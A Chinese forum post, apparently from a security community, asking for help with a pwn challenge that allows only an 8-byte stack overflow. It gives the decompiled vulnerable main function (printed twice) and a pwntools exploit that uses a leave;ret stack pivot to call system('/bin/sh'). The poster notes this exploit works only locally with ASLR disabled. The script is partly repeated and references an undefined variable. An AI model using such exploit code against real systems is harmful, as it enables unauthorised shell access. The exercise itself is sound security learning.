IDA反编译结果:只有8个字节的溢出位,只能覆盖EBP和返回地址,看来是要栈迁移
如果利用一次leave ret把ESP迁移到BSS,那么也没有机会在BSS上写好栈内容! 所以不知道怎么做。请教各位大佬有没有什么办法。
下面是非正解:把系统的ASLR关了,用固定的栈地址做迁移,在本地getshell,但是如果打开ASLR,实际情况有几个问题:1,栈地址无法获取,2.libc版本不明,3.libc_base无法获取
以上exp只能在本地关闭aslr的情况下才能生效。请大佬想想其他的思路
int __cdecl main()
{
char buf; // [esp+0h] [ebp-100h]
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
puts("Sorry,but there is no output!!\nJust Input Something:");
read(0, &buf, 0x108u);
return 0;
}
int __cdecl main()
{
char buf; // [esp+0h] [ebp-100h]
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
puts("Sorry,but there is no output!!\nJust Input Something:");
read(0, &buf, 0x108u);
return 0;
}
from pwn import *
context(arch='i386', os='linux')
context.terminal = ['/usr/bin/tmux', 'splitw', '-h']
leaveret_add = 0x08048514
p = process('./nooutput')
lib = ELF("/usr/lib32/libc.so.6")
libc_base = 0xf7dcd000
p.readuntil('Something:\n')
stackAddr = 0xffffd498
log.info(hex(stackAddr))
sysAddr = libc_base + lib.symbols['system']
exitAddr = libc_base + lib.symbols['exit']
binsh = libc_base + lib.search("/bin/sh").next()
exploit = p32(0x90909090)
exploit += p32(sysAddr)
exploit += p32(exitAddr)
exploit += p32(binsh)
exploit += nops * (0x100 - len(exploit))
exploit += p32(stackAddr)
exploit += p32(leaveret_add)
p.sendline( exploit)
p.interactive()
from pwn import *
context(arch='i386', os='linux')
context.terminal = ['/usr/bin/tmux', 'splitw', '-h']
leaveret_add = 0x08048514
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
